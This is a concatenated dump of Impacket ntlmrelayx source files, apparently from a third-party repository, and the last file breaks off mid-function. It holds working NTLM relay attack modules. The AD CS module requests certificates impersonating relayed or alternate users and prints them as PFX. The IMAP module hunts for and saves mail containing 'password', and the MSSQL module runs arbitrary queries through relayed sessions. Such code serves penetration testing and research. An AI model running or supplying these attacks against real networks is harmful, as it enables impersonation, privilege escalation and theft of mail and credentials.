/impacket/impacket/examples/logger.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # This logger is intended to be used by impacket instead
11 | # of printing directly. This will allow other libraries to use their
12 | # custom logging implementation.
13 | #
14 |
15 | import logging
16 | import sys
17 |
18 | # This module can be used by scripts using the Impacket library
19 | # in order to configure the root logger to output events
20 | # generated by the library with a predefined format
21 |
22 | # If the scripts want to generate log entries, they can write
23 | # directly to the root logger (logging.info, debug, etc).
24 |
25 | class ImpacketFormatter(logging.Formatter):
26 | '''
27 | Prefixing logged messages through the custom attribute 'bullet'.
28 | '''
29 | def __init__(self):
30 | logging.Formatter.__init__(self,'%(bullet)s %(message)s', None)
31 |
32 | def format(self, record):
33 | if record.levelno == logging.INFO:
34 | record.bullet = '[*]'
35 | elif record.levelno == logging.DEBUG:
36 | record.bullet = '[+]'
37 | elif record.levelno == logging.WARNING:
38 | record.bullet = '[!]'
39 | else:
40 | record.bullet = '[-]'
41 |
42 | return logging.Formatter.format(self, record)
43 |
44 | class ImpacketFormatterTimeStamp(ImpacketFormatter):
45 | '''
46 | Prefixing logged messages through the custom attribute 'bullet'.
47 | '''
48 | def __init__(self):
49 | logging.Formatter.__init__(self,'[%(asctime)-15s] %(bullet)s %(message)s', None)
50 |
51 | def formatTime(self, record, datefmt=None):
52 | return ImpacketFormatter.formatTime(self, record, datefmt="%Y-%m-%d %H:%M:%S")
53 |
54 | def init(ts=False):
55 | # We add a StreamHandler and formatter to the root logger
56 | handler = logging.StreamHandler(sys.stdout)
57 | if not ts:
58 | handler.setFormatter(ImpacketFormatter())
59 | else:
60 | handler.setFormatter(ImpacketFormatterTimeStamp())
61 | logging.getLogger().addHandler(handler)
62 | logging.getLogger().setLevel(logging.INFO)
63 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Protocol Attack Base Class definition
11 | # Defines a base class for all attacks + loads all available modules
12 | #
13 | # Author:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | import os, sys
18 | import pkg_resources
19 | from impacket import LOG
20 | from threading import Thread
21 |
22 | PROTOCOL_ATTACKS = {}
23 |
24 | # Base class for Protocol Attacks for different protocols (SMB, MSSQL, etc)
25 | # Besides using this base class you need to define one global variable when
26 | # writing a plugin for protocol clients:
27 | # PROTOCOL_ATTACK_CLASS = ""
28 | # or (to support multiple classes in one file)
29 | # PROTOCOL_ATTACK_CLASSES = ["", ""]
30 | # These classes must have the attribute PLUGIN_NAMES which is a list of protocol names
31 | # that will be matched later with the relay targets (e.g. SMB, LDAP, etc)
32 | class ProtocolAttack(Thread):
33 | PLUGIN_NAMES = ['PROTOCOL']
34 | def __init__(self, config, client, username):
35 | Thread.__init__(self)
36 | # Set threads as daemon
37 | self.daemon = True
38 | self.config = config
39 | self.client = client
40 | # By default we only use the username and remove the domain
41 | self.username = username.split('/')[1]
42 |
43 | def run(self):
44 | raise RuntimeError('Virtual Function')
45 |
46 | for file in pkg_resources.resource_listdir('impacket.examples.ntlmrelayx', 'attacks'):
47 | if file.find('__') >= 0 or file.endswith('.py') is False:
48 | continue
49 | # This seems to be None in some case (py3 only)
50 | # __spec__ is py3 only though, but I haven't seen this being None on py2
51 | # so it should cover all cases.
52 | try:
53 | package = __spec__.name # Python 3
54 | except NameError:
55 | package = __package__ # Python 2
56 | __import__(package + '.' + os.path.splitext(file)[0])
57 | module = sys.modules[package + '.' + os.path.splitext(file)[0]]
58 | try:
59 | pluginClasses = set()
60 | try:
61 | if hasattr(module, 'PROTOCOL_ATTACK_CLASSES'):
62 | # Multiple classes
63 | for pluginClass in module.PROTOCOL_ATTACK_CLASSES:
64 | pluginClasses.add(getattr(module, pluginClass))
65 | else:
66 | # Single class
67 | pluginClasses.add(getattr(module, getattr(module, 'PROTOCOL_ATTACK_CLASS')))
68 | except Exception as e:
69 | LOG.debug(e)
70 | pass
71 |
72 | for pluginClass in pluginClasses:
73 | for pluginName in pluginClass.PLUGIN_NAMES:
74 | LOG.debug('Protocol Attack %s loaded..' % pluginName)
75 | PROTOCOL_ATTACKS[pluginName] = pluginClass
76 | except Exception as e:
77 | LOG.debug(str(e))
78 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/dcsyncattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # HTTP Attack Class
11 | # HTTP protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
18 | from impacket.examples.secretsdump import RemoteOperations, SAMHashes, NTDSHashes
19 |
20 | PROTOCOL_ATTACK_CLASS = "DCSYNCAttack"
21 |
22 | class DCSYNCAttack(ProtocolAttack):
23 | """
24 | This is the default HTTP attack. This attack only dumps the root page, though
25 | you can add any complex attack below. self.client is an instance of urrlib.session
26 | For easy advanced attacks, use the SOCKS option and use curl or a browser to simply
27 | proxy through ntlmrelayx
28 | """
29 | PLUGIN_NAMES = ["DCSYNC"]
30 | def run(self):
31 | return
32 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # HTTP Attack Class
11 | # HTTP protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | # Ex Android Dev (@ExAndroidDev)
17 |
18 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
19 | from impacket.examples.ntlmrelayx.attacks.httpattacks.adcsattack import ADCSAttack
20 |
21 | PROTOCOL_ATTACK_CLASS = "HTTPAttack"
22 |
23 |
24 | class HTTPAttack(ProtocolAttack, ADCSAttack):
25 | """
26 | This is the default HTTP attack. This attack only dumps the root page, though
27 | you can add any complex attack below. self.client is an instance of urrlib.session
28 | For easy advanced attacks, use the SOCKS option and use curl or a browser to simply
29 | proxy through ntlmrelayx
30 | """
31 | PLUGIN_NAMES = ["HTTP", "HTTPS"]
32 |
33 | def run(self):
34 |
35 | if self.config.isADCSAttack:
36 | ADCSAttack._run(self)
37 | else:
38 | # Default action: Dump requested page to file, named username-targetname.html
39 | # You can also request any page on the server via self.client.session,
40 | # for example with:
41 | self.client.request("GET", "/")
42 | r1 = self.client.getresponse()
43 | print(r1.status, r1.reason)
44 | data1 = r1.read()
45 | print(data1)
46 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/httpattacks/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/impacket/examples/ntlmrelayx/attacks/httpattacks/__init__.py
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # AD CS relay attack
11 | #
12 | # Authors:
13 | # Ex Android Dev (@ExAndroidDev)
14 | # Tw1sm (@Tw1sm)
15 |
16 | import re
17 | import base64
18 | from OpenSSL import crypto
19 |
20 | from impacket import LOG
21 |
22 | # cache already attacked clients
23 | ELEVATED = []
24 |
25 |
26 | class ADCSAttack:
27 |
28 | def _run(self):
29 | key = crypto.PKey()
30 | key.generate_key(crypto.TYPE_RSA, 4096)
31 |
32 | if self.username in ELEVATED:
33 | LOG.info('Skipping user %s since attack was already performed' % self.username)
34 | return
35 |
36 | current_template = self.config.template
37 | if current_template is None:
38 | current_template = "Machine" if self.username.endswith("$") else "User"
39 |
40 | csr = self.generate_csr(key, self.username, self.config.altName)
41 | csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
42 | LOG.info("CSR generated!")
43 |
44 | certAttrib = self.generate_certattributes(current_template, self.config.altName)
45 |
46 | data = "Mode=newreq&CertRequest=%s&CertAttrib=%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, certAttrib)
47 |
48 | headers = {
49 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
50 | "Content-Type": "application/x-www-form-urlencoded",
51 | "Content-Length": len(data)
52 | }
53 |
54 | LOG.info("Getting certificate...")
55 |
56 | self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
57 | ELEVATED.append(self.username)
58 | response = self.client.getresponse()
59 |
60 | if response.status != 200:
61 | LOG.error("Error getting certificate! Make sure you have entered valid certiface template.")
62 | return
63 |
64 | content = response.read()
65 | found = re.findall(r'location="certnew.cer\?ReqID=(.*?)&', content.decode())
66 | if len(found) == 0:
67 | LOG.error("Error obtaining certificate!")
68 | return
69 |
70 | certificate_id = found[0]
71 |
72 | self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id)
73 | response = self.client.getresponse()
74 |
75 | LOG.info("GOT CERTIFICATE! ID %s" % certificate_id)
76 | certificate = response.read().decode()
77 |
78 | certificate_store = self.generate_pfx(key, certificate)
79 | LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
80 |
81 | if self.config.altName:
82 | LOG.info("This certificate can also be used for user : {}".format(self.config.altName))
83 |
84 | def generate_csr(self, key, CN, altName):
85 | LOG.info("Generating CSR...")
86 | req = crypto.X509Req()
87 | req.get_subject().CN = CN
88 |
89 | if altName:
90 | req.add_extensions([crypto.X509Extension(b"subjectAltName", False, b"otherName:1.3.6.1.4.1.311.20.2.3;UTF8:%b" % altName.encode() )])
91 |
92 |
93 | req.set_pubkey(key)
94 | req.sign(key, "sha256")
95 |
96 | return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req)
97 |
98 | def generate_pfx(self, key, certificate):
99 | certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
100 | p12 = crypto.PKCS12()
101 | p12.set_certificate(certificate)
102 | p12.set_privatekey(key)
103 | return p12.export()
104 |
105 | def generate_certattributes(self, template, altName):
106 |
107 | if altName:
108 | return "CertificateTemplate:{}%0d%0aSAN:upn={}".format(template, altName)
109 | return "CertificateTemplate:{}".format(template)
110 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/imapattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IMAP Attack Class
11 | # IMAP protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | import re
18 | import os
19 | from impacket import LOG
20 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
21 |
22 | PROTOCOL_ATTACK_CLASS = "IMAPAttack"
23 |
24 | class IMAPAttack(ProtocolAttack):
25 | """
26 | This is the default IMAP(s) attack. By default it searches the INBOX imap folder
27 | for messages with "password" in the header or body. Alternate keywords can be specified
28 | on the command line. For more advanced attacks, consider using the SOCKS feature.
29 | """
30 | PLUGIN_NAMES = ["IMAP", "IMAPS"]
31 | def run(self):
32 | #Default action: Search the INBOX
33 | targetBox = self.config.mailbox
34 | result, data = self.client.select(targetBox,True) #True indicates readonly
35 | if result != 'OK':
36 | LOG.error('Could not open mailbox %s: %s' % (targetBox, data))
37 | LOG.info('Opening mailbox INBOX')
38 | targetBox = 'INBOX'
39 | result, data = self.client.select(targetBox,True) #True indicates readonly
40 | inboxCount = int(data[0])
41 | LOG.info('Found %s messages in mailbox %s' % (inboxCount, targetBox))
42 | #If we should not dump all, search for the keyword
43 | if not self.config.dump_all:
44 | result, rawdata = self.client.search(None, 'OR', 'SUBJECT', '"%s"' % self.config.keyword, 'BODY', '"%s"' % self.config.keyword)
45 | #Check if search worked
46 | if result != 'OK':
47 | LOG.error('Search failed: %s' % rawdata)
48 | return
49 | dumpMessages = []
50 | #message IDs are separated by spaces
51 | for msgs in rawdata:
52 | dumpMessages += msgs.split(' ')
53 | if self.config.dump_max != 0 and len(dumpMessages) > self.config.dump_max:
54 | dumpMessages = dumpMessages[:self.config.dump_max]
55 | else:
56 | #Dump all mails, up to the maximum number configured
57 | if self.config.dump_max == 0 or self.config.dump_max > inboxCount:
58 | dumpMessages = list(range(1, inboxCount+1))
59 | else:
60 | dumpMessages = list(range(1, self.config.dump_max+1))
61 |
62 | numMsgs = len(dumpMessages)
63 | if numMsgs == 0:
64 | LOG.info('No messages were found containing the search keywords')
65 | else:
66 | LOG.info('Dumping %d messages found by search for "%s"' % (numMsgs, self.config.keyword))
67 | for i, msgIndex in enumerate(dumpMessages):
68 | #Fetch the message
69 | result, rawMessage = self.client.fetch(msgIndex, '(RFC822)')
70 | if result != 'OK':
71 | LOG.error('Could not fetch message with index %s: %s' % (msgIndex, rawMessage))
72 | continue
73 |
74 | #Replace any special chars in the mailbox name and username
75 | mailboxName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', targetBox)
76 | textUserName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username)
77 |
78 | #Combine username with mailboxname and mail number
79 | fileName = 'mail_' + textUserName + '-' + mailboxName + '_' + str(msgIndex) + '.eml'
80 |
81 | #Write it to the file
82 | with open(os.path.join(self.config.lootdir,fileName),'w') as of:
83 | of.write(rawMessage[0][1])
84 | LOG.info('Done fetching message %d/%d' % (i+1,numMsgs))
85 |
86 | #Close connection cleanly
87 | self.client.logout()
88 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/mssqlattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # MSSQL Attack Class
11 | # MSSQL protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | # Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)
17 | #
18 | from impacket import LOG
19 | from impacket.examples.mssqlshell import SQLSHELL
20 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
21 |
22 | PROTOCOL_ATTACK_CLASS = "MSSQLAttack"
23 |
24 | class MSSQLAttack(ProtocolAttack):
25 | PLUGIN_NAMES = ["MSSQL"]
26 | def run(self):
27 | if self.config.queries is not None:
28 | for query in self.config.queries:
29 | LOG.info('Executing SQL: %s' % query)
30 | self.client.sql_query(query)
31 | self.client.printReplies()
32 | self.client.printRows()
33 | elif self.config.interactive is True:
34 | shell = SQLSHELL(self.client)
35 | shell.cmdloop()
36 | return
37 | else:
38 | LOG.error('No SQL queries specified for MSSQL relay!')
39 |
40 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/clients/imaprelayclient.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IMAP Protocol Client
11 | # IMAP client for relaying NTLMSSP authentication to mailservers, for example Exchange
12 | #
13 | # Author:
14 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
15 | # Alberto Solino (@agsolino)
16 | #
17 | import imaplib
18 | import base64
19 | from struct import unpack
20 |
21 | from impacket import LOG
22 | from impacket.examples.ntlmrelayx.clients import ProtocolClient
23 | from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED
24 | from impacket.ntlm import NTLMAuthChallenge
25 | from impacket.spnego import SPNEGO_NegTokenResp
26 |
27 | PROTOCOL_CLIENT_CLASSES = ["IMAPRelayClient","IMAPSRelayClient"]
28 |
29 | class IMAPRelayClient(ProtocolClient):
30 | PLUGIN_NAME = "IMAP"
31 |
32 | def __init__(self, serverConfig, target, targetPort = 143, extendedSecurity=True ):
33 | ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity)
34 |
35 | def initConnection(self):
36 | self.session = imaplib.IMAP4(self.targetHost,self.targetPort)
37 | self.authTag = self.session._new_tag()
38 | LOG.debug('IMAP CAPABILITIES: %s' % str(self.session.capabilities))
39 | if 'AUTH=NTLM' not in self.session.capabilities:
40 | LOG.error('IMAP server does not support NTLM authentication!')
41 | return False
42 | return True
43 |
44 | def sendNegotiate(self,negotiateMessage):
45 | negotiate = base64.b64encode(negotiateMessage)
46 | self.session.send('%s AUTHENTICATE NTLM%s' % (self.authTag,imaplib.CRLF))
47 | resp = self.session.readline().strip()
48 | if resp != '+':
49 | LOG.error('IMAP Client error, expected continuation (+), got %s ' % resp)
50 | return False
51 | else:
52 | self.session.send(negotiate + imaplib.CRLF)
53 | try:
54 | serverChallengeBase64 = self.session.readline().strip()[2:] #first two chars are the continuation and space char
55 | serverChallenge = base64.b64decode(serverChallengeBase64)
56 | challenge = NTLMAuthChallenge()
57 | challenge.fromString(serverChallenge)
58 | return challenge
59 | except (IndexError, KeyError, AttributeError):
60 | LOG.error('No NTLM challenge returned from IMAP server')
61 | raise
62 |
63 | def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
64 | if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
65 | respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
66 | token = respToken2['ResponseToken']
67 | else:
68 | token = authenticateMessageBlob
69 | auth = base64.b64encode(token)
70 | self.session.send(auth + imaplib.CRLF)
71 | typ, data = self.session._get_tagged_response(self.authTag)
72 | if typ == 'OK':
73 | self.session.state = 'AUTH'
74 | return None, STATUS_SUCCESS
75 | else:
76 | LOG.error('IMAP: %s' % ' '.join(data))
77 | return None, STATUS_ACCESS_DENIED
78 |
79 | def killConnection(self):
80 | if self.session is not None:
81 | self.session.logout()
82 | self.session = None
83 |
84 | def keepAlive(self):
85 | # Send a NOOP
86 | self.session.noop()
87 |
88 | class IMAPSRelayClient(IMAPRelayClient):
89 | PLUGIN_NAME = "IMAPS"
90 |
91 | def __init__(self, serverConfig, targetHost, targetPort = 993, extendedSecurity=True ):
92 | ProtocolClient.__init__(self, serverConfig, targetHost, targetPort, extendedSecurity)
93 |
94 | def initConnection(self):
95 | self.session = imaplib.IMAP4_SSL(self.targetHost,self.targetPort)
96 | self.authTag = self.session._new_tag()
97 | LOG.debug('IMAP CAPABILITIES: %s' % str(self.session.capabilities))
98 | if 'AUTH=NTLM' not in self.session.capabilities:
99 | LOG.error('IMAP server does not support NTLM authentication!')
100 | return False
101 | return True
102 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/clients/smtprelayclient.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # SMTP Protocol Client
11 | # SMTP client for relaying NTLMSSP authentication to mailservers, for example Exchange
12 | #
13 | # Author:
14 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
15 | # Alberto Solino (@agsolino)
16 | #
17 | import smtplib
18 | import base64
19 | from struct import unpack
20 |
21 | from impacket import LOG
22 | from impacket.examples.ntlmrelayx.clients import ProtocolClient
23 | from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED
24 | from impacket.ntlm import NTLMAuthChallenge
25 | from impacket.spnego import SPNEGO_NegTokenResp
26 |
27 | PROTOCOL_CLIENT_CLASSES = ["SMTPRelayClient"]
28 |
29 | class SMTPRelayClient(ProtocolClient):
30 | PLUGIN_NAME = "SMTP"
31 |
32 | def __init__(self, serverConfig, target, targetPort = 25, extendedSecurity=True ):
33 | ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity)
34 |
35 | def initConnection(self):
36 | self.session = smtplib.SMTP(self.targetHost,self.targetPort)
37 | # Turn on to debug SMTP messages
38 | # self.session.debuglevel = 3
39 | self.session.ehlo()
40 |
41 | if 'AUTH NTLM' not in self.session.ehlo_resp:
42 | LOG.error('SMTP server does not support NTLM authentication!')
43 | return False
44 | return True
45 |
46 | def sendNegotiate(self,negotiateMessage):
47 | negotiate = base64.b64encode(negotiateMessage)
48 | self.session.putcmd('AUTH NTLM')
49 | code, resp = self.session.getreply()
50 | if code != 334:
51 | LOG.error('SMTP Client error, expected 334 NTLM supported, got %d %s ' % (code, resp))
52 | return False
53 | else:
54 | self.session.putcmd(negotiate)
55 | try:
56 | code, serverChallengeBase64 = self.session.getreply()
57 | serverChallenge = base64.b64decode(serverChallengeBase64)
58 | challenge = NTLMAuthChallenge()
59 | challenge.fromString(serverChallenge)
60 | return challenge
61 | except (IndexError, KeyError, AttributeError):
62 | LOG.error('No NTLM challenge returned from SMTP server')
63 | raise
64 |
65 | def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
66 | if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
67 | respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
68 | token = respToken2['ResponseToken']
69 | else:
70 | token = authenticateMessageBlob
71 | auth = base64.b64encode(token)
72 | self.session.putcmd(auth)
73 | typ, data = self.session.getreply()
74 | if typ == 235:
75 | self.session.state = 'AUTH'
76 | return None, STATUS_SUCCESS
77 | else:
78 | LOG.error('SMTP: %s' % ''.join(data))
79 | return None, STATUS_ACCESS_DENIED
80 |
81 | def killConnection(self):
82 | if self.session is not None:
83 | self.session.close()
84 | self.session = None
85 |
86 | def keepAlive(self):
87 | # Send a NOOP
88 | self.session.noop()
89 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | from impacket.examples.ntlmrelayx.servers.httprelayserver import HTTPRelayServer
10 | from impacket.examples.ntlmrelayx.servers.smbrelayserver import SMBRelayServer
11 | from impacket.examples.ntlmrelayx.servers.wcfrelayserver import WCFRelayServer
12 | from impacket.examples.ntlmrelayx.servers.rawrelayserver import RAWRelayServer
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/socksplugins/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | import os
10 | import sys
11 | import pkg_resources
12 |
13 | SOCKS_RELAYS = set()
14 |
15 | for file in pkg_resources.resource_listdir('impacket.examples.ntlmrelayx.servers', 'socksplugins'):
16 | if file.find('__') >= 0 or file.endswith('.py') is False:
17 | continue
18 | # This seems to be None in some case (py3 only)
19 | # __spec__ is py3 only though, but I haven't seen this being None on py2
20 | # so it should cover all cases.
21 | try:
22 | package = __spec__.name # Python 3
23 | except NameError:
24 | package = __package__ # Python 2
25 | __import__(package + '.' + os.path.splitext(file)[0])
26 | module = sys.modules[package + '.' + os.path.splitext(file)[0]]
27 | pluginClass = getattr(module, getattr(module, 'PLUGIN_CLASS'))
28 | SOCKS_RELAYS.add(pluginClass)
29 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/socksplugins/https.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Socks Proxy for the HTTPS Protocol
11 | #
12 | # A simple SOCKS server that proxies a connection to relayed HTTPS connections
13 | #
14 | # Author:
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | from impacket import LOG
18 | from impacket.examples.ntlmrelayx.servers.socksplugins.http import HTTPSocksRelay
19 | from impacket.examples.ntlmrelayx.utils.ssl import SSLServerMixin
20 | from OpenSSL import SSL
21 |
22 | # Besides using this base class you need to define one global variable when
23 | # writing a plugin:
24 | PLUGIN_CLASS = "HTTPSSocksRelay"
25 | EOL = '\r\n'
26 |
27 | class HTTPSSocksRelay(SSLServerMixin, HTTPSocksRelay):
28 | PLUGIN_NAME = 'HTTPS Socks Plugin'
29 | PLUGIN_SCHEME = 'HTTPS'
30 |
31 | def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
32 | HTTPSocksRelay.__init__(self, targetHost, targetPort, socksSocket, activeRelays)
33 |
34 | @staticmethod
35 | def getProtocolPort():
36 | return 443
37 |
38 | def skipAuthentication(self):
39 | LOG.debug('Wrapping client connection in TLS/SSL')
40 | self.wrapClientConnection()
41 | if not HTTPSocksRelay.skipAuthentication(self):
42 | # Shut down TLS connection
43 | self.socksSocket.shutdown()
44 | return False
45 | return True
46 |
47 | def tunnelConnection(self):
48 | while True:
49 | try:
50 | data = self.socksSocket.recv(self.packetSize)
51 | except SSL.ZeroReturnError:
52 | # The SSL connection was closed, return
53 | return
54 | # Pass the request to the server
55 | tosend = self.prepareRequest(data)
56 | self.relaySocket.send(tosend)
57 | # Send the response back to the client
58 | self.transferResponse()
59 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/socksplugins/imaps.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Socks Proxy for the IMAPS Protocol
11 | #
12 | # A simple SOCKS server that proxies a connection to relayed IMAPS connections
13 | #
14 | # Author:
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | from impacket import LOG
18 | from impacket.examples.ntlmrelayx.servers.socksplugins.imap import IMAPSocksRelay
19 | from impacket.examples.ntlmrelayx.utils.ssl import SSLServerMixin
20 | from OpenSSL import SSL
21 |
22 | # Besides using this base class you need to define one global variable when
23 | # writing a plugin:
24 | PLUGIN_CLASS = "IMAPSSocksRelay"
25 | EOL = '\r\n'
26 |
27 | class IMAPSSocksRelay(SSLServerMixin, IMAPSocksRelay):
28 | PLUGIN_NAME = 'IMAPS Socks Plugin'
29 | PLUGIN_SCHEME = 'IMAPS'
30 |
31 | def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
32 | IMAPSocksRelay.__init__(self, targetHost, targetPort, socksSocket, activeRelays)
33 |
34 | @staticmethod
35 | def getProtocolPort():
36 | return 993
37 |
38 | def skipAuthentication(self):
39 | LOG.debug('Wrapping IMAP client connection in TLS/SSL')
40 | self.wrapClientConnection()
41 | try:
42 | if not IMAPSocksRelay.skipAuthentication(self):
43 | # Shut down TLS connection
44 | self.socksSocket.shutdown()
45 | return False
46 | except Exception as e:
47 | LOG.debug('IMAPS: %s' % str(e))
48 | return False
49 | # Change our outgoing socket to the SSL object of IMAP4_SSL
50 | self.relaySocket = self.session.sslobj
51 | return True
52 |
53 | def tunnelConnection(self):
54 | keyword = ''
55 | tag = ''
56 | while True:
57 | try:
58 | data = self.socksSocket.recv(self.packetSize)
59 | except SSL.ZeroReturnError:
60 | # The SSL connection was closed, return
61 | break
